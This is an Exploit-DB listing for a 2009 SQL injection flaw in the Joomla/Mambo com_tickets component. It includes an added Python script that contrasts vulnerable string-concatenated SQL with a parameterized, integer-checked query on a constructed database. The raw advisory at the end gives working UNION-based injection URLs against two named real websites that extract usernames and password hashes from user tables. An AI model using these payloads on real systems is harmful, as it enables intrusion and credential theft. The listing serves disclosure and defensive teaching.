Vendor: Tickets
Author: Chip D3 Bi0s
CVSS: 7.5 (HIGH)
Vulnerability class: SQL injection
CWE: 89
Product Name: Tickets
Affected Version From: 0.1
Affected Version To: 2.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla, Mambo
Published: 2009

Joomla Component com_tickets (id) SQL-injection Vulnerability

A vulnerability exists in the Joomla component com_tickets which allows an attacker to inject arbitrary SQL via the 'id' parameter of the `task=form` request: the parameter value is placed into the component's database query without type checking or escaping, so the query can be manipulated with attacker-controlled SQL. The vulnerability is confirmed in versions 0.1 and 2.1. The original advisory also includes live demo URLs for both a Joomla and a Mambo installation.

Mitigation:

Upgrade to the latest version of Joomla Component com_tickets.
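To make the defect class concrete from the defender's side, the following Python script is an added illustration, not part of this listing and not the component's code. It assumes a toy schema (the `jos_users` table name is borrowed from the advisory; the `jos_tickets` table, its columns and every row are constructed), uses SQLite in place of the MySQL backend a Joomla site would have, and contrasts a handler that concatenates the `id` parameter into SQL with the hardened form: an integer check followed by a bound parameter. The query string is parsed with `urllib.parse.parse_qs` so the `id` value arrives exactly as a web server would decode it.

```python
import re
import sqlite3
from urllib.parse import parse_qs


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory schema for the example. Only the jos_users table
    name comes from the advisory; the rest is invented and is not the real
    component schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jos_tickets (id INTEGER PRIMARY KEY, title TEXT, price TEXT)")
    conn.execute("CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO jos_tickets VALUES (?, ?, ?)",
                     [(1, "Gala dinner", "25.00"), (2, "Matinee", "10.00")])
    # Placeholder credential row; no real hash is involved.
    conn.execute("INSERT INTO jos_users VALUES (?, ?, ?)", (62, "admin", "HASH-PLACEHOLDER"))
    conn.commit()
    return conn


def id_from_query_string(query_string: str) -> str:
    """Return the raw 'id' value as the web server hands it to the component:
    parse_qs turns '+' into spaces and decodes %xx escapes, and splits each
    pair on the first '=' only, so '1=2' inside the value survives."""
    return parse_qs(query_string).get("id", [""])[0]


def lookup_ticket_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """The defect class the advisory describes: the request parameter is
    concatenated into the SQL text, so whatever it contains is parsed as SQL."""
    sql = "SELECT id, title, price FROM jos_tickets WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


# Accept only a short run of ASCII digits; anything else is rejected up front.
INTEGER_ID = re.compile(r"[0-9]{1,10}")


def lookup_ticket_safe(conn: sqlite3.Connection, raw_id: str):
    """Hardened form: validate the type, then bind the value as a parameter.
    Parameter binding alone closes the injection; the explicit integer check
    adds a clean rejection path that an application can log and alert on."""
    if INTEGER_ID.fullmatch(raw_id) is None:
        raise ValueError("id must be a decimal integer")
    ticket_id = int(raw_id)
    return conn.execute(
        "SELECT id, title, price FROM jos_tickets WHERE id = ?", (ticket_id,)
    ).fetchall()


# Two constructed requests: a normal one, and one shaped like the advisory's
# demo URL but trimmed to the three columns the toy query returns.
BENIGN_QS = "option=com_tickets&task=form&id=1"
INJECTED_QS = ("option=com_tickets&task=form&id=1+and+1=2+union+select+"
               "1,username||':'||password,3+from+jos_users")


def demo() -> dict:
    """Run both handlers against both requests and summarise the outcome."""
    conn = build_demo_db()
    benign = id_from_query_string(BENIGN_QS)
    injected = id_from_query_string(INJECTED_QS)
    vulnerable_rows = lookup_ticket_vulnerable(conn, injected)
    safe_rows = lookup_ticket_safe(conn, benign)
    try:
        lookup_ticket_safe(conn, injected)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "benign_id": benign,
        # True when the concatenated query returned a jos_users row instead of a ticket.
        "vulnerable_leaks_users": any("HASH-PLACEHOLDER" in str(row) for row in vulnerable_rows),
        "safe_rows": safe_rows,
        "injected_rejected": rejected,
    }


if __name__ == "__main__":
    print(demo())
```

The contrast to take away is in `lookup_ticket_safe`: the `?` placeholder means the database driver never parses the value as SQL, so even if the integer check were dropped the `union select` text would only ever be compared against the `id` column as a string. The check is still worth keeping because a rejected request is a signal worth recording, whereas a bound parameter silently returns no rows.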
Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_tickets (id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################
[+] Author        :  Chip D3 Bi0s
[+] Email         :  chipdebios[alt+64]gmail.com
[+] Greetz        :  d4n1ux + x_jeshua + eCORE + rayok3nt
[+] Vulnerability :  SQL injection 

###################################################

Info component:
---------------
Name 		: Tickets
Version		: 0.1 & 2.1
Author		: Paul Coogan
Author email	: paul@ideabuzz.com
Web author 	: http://www.ideabuzz.com

###################################################

Example:
http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]

n = id valid


Demo Live Joomla : version 2.1
------------------------------
http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/*

Demo Live Mambo : Version 0.1
-----------------------------
http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/*


+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-06-22]